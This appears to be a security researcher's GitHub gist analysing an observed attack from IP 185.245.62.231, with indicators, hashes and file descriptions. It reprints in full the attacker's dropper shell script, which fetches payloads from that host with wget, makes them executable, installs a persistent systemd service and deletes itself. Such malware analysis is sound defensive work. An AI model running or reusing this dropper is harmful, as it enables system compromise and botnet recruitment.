Skip to content

Instantly share code, notes, and snippets.

@dlee35
Last active March 6, 2022 17:59
Show Gist options
  • Save dlee35/541f919ef5344a1ec642751147bbefe1 to your computer and use it in GitHub Desktop.
Save dlee35/541f919ef5344a1ec642751147bbefe1 to your computer and use it in GitHub Desktop.
Attack Observation Four - Notes (185.245.62.231)

IP info:

ip: "185.245.62.231",
city: "Frankfurt am Main",
org: "AS200303 Jan Philipp Waldecker trading as LUMASERV Systems",
postal: "60306",
timezone: "Europe/Berlin"

test.sh (f0869b01daa7d4ca611de720e87a8423c5ab03b194d4dfe92b54302a7ee74ceb):

#!/bin/sh
apt-get -y install python3;
apt-get -y install nodejs;
cd /etc/;
wget hxxp://185.245.62.231/x1;
wget hxxp://185.245.62.231/v1.py;
wget hxxp://185.245.62.231/g1.js;
wget hxxp://185.245.62.231/s1;
wget hxxp://185.245.62.231/p1.txt;
chmod 777 x1;
chmod 777 v1.py;
chmod 777 g1.js;
chmod 777 s1;
chmod 777 p1.txt;
printf "[Unit]\nDescription=System\n[Service]\nExecStart=/usr/bin/python3 /etc/v1.py\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/hosting.service;
systemctl enable hosting;
systemctl start hosting;
rm -r /etc/test.sh;

g1.js (5a5617cffae3b052f632a5be52190cdb):
- connection script with list of useragents to randomly cycle through
p1.txt (39e254dbab7a6031f11524547fb5b6f1):
- list of 951 ip addresses and ports in colon-separated format
- ex: 5.180.130.90:80
-typically HTTP related ports (i.e., 80, 8000, 8080), but also some ephemeral (e.g., 17471, 17980, 55507)
v1.py (aa41d0d0c9d7709d86527f972131415b):
- python script referenced as hosting.service in test.sh
- heavily obfuscated using AtShai service below
s1 (434ed30938bef3099217f8c00c62fb77):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/cefe44a4efdea412a70d6568096476476d00e925a6908b45cc0b4d6c36971126
x1 (781aa9e40ef59f3526e7f89d13b4e4e8):
- VT first submission 2022-03-05 03:37:52 UTC
- https://www.virustotal.com/gui/file/9aaa130eaaedcd4bba0b0056a5feff4b967fc88bc3d457be8b8b2f0309965c6f/details
- many strings align with the following C code: https://github.com/isdrupter/busybotnet/blob/master/miscutils/udpspoof.c

AtShai:
- obfuscation as a service (OaaS?)
- https://www.youtube.com/channel/UCdjncPtlh39boMqFrGx_yxw
- https://atshai.com/python-obfuscator-obfuscating-python-scripts.php
- https://www.enscrypt.io/python-pricing-table-online-popular.php

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment